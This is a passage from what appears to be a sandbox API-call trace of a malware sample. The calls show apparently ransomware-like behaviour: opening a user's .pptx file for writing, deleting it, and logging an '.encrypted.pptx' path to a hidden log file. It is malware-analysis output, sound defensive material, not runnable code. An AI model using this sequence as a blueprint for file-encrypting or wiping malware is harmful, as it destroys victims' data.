wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.578] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.578] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0030.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0030.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.578] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.578] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.578] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3f51b0, ftCreationTime.dwHighDateTime=0x1d5bfc8, ftLastAccessTime.dwLowDateTime=0x418c8390, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x418c8390, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x3119, dwReserved0=0x0, dwReserved1=0x777648, cFileName="0CZNNBZljlBQ.pptx", cAlternateFileName="0CZNNB~1.PPT")) returned 0x7c2240 [0030.578] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0030.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.578] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.578] CharLowerBuffW (in: lpsz="byte[12569]", cchLength=0xb | out: lpsz="byte[12569]") returned 0xb [0030.578] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.578] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.578] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.578] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.578] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.579] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.579] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.579] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.579] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.580] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.580] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0030.580] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.580] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\0cznnbzljlbq.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0030.581] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.581] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.581] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.581] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.581] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.581] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.581] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.581] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.581] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.581] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.581] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.581] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.581] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.582] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.582] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.582] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.582] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.582] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx", lpFilePart=0x0) returned 0x50 [0030.582] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3f51b0, ftCreationTime.dwHighDateTime=0x1d5bfc8, ftLastAccessTime.dwLowDateTime=0x418c8390, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x121bc5a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3119, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="0CZNNBZljlBQ.pptx", cAlternateFileName="0CZNNB~1.PPT")) returned 0x7c2240 [0030.582] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\0cznnbzljlbq.pptx")) returned 1 [0030.583] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3f51b0, ftCreationTime.dwHighDateTime=0x1d5bfc8, ftLastAccessTime.dwLowDateTime=0x418c8390, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x121bc5a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3119, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="0CZNNBZljlBQ.pptx", cAlternateFileName="0CZNNB~1.PPT")) returned 0 [0030.584] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.585] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.585] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.585] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.585] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.585] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.586] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0030.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.586] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0030.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.586] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.586] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.586] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.586] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.586] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.587] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.587] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.587] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6aee3c*=0x426, lpOverlapped=0x0) returned 1 [0030.588] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.588] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x426, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.588] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.encrypted.pptx\r\n", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0030.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5d) returned 0x87a9d8 [0030.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.encrypted.pptx\r\n", cchWideChar=93, lpMultiByteStr=0x87a9d8, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.encrypted.pptx\r\n", lpUsedDefaultChar=0x0) returned 93 [0030.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0030.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0030.588] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x5c, lpOverlapped=0x0) returned 1 [0030.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0030.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.589] CloseHandle (hObject=0x128) returned 1 [0030.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x936008 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.591] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 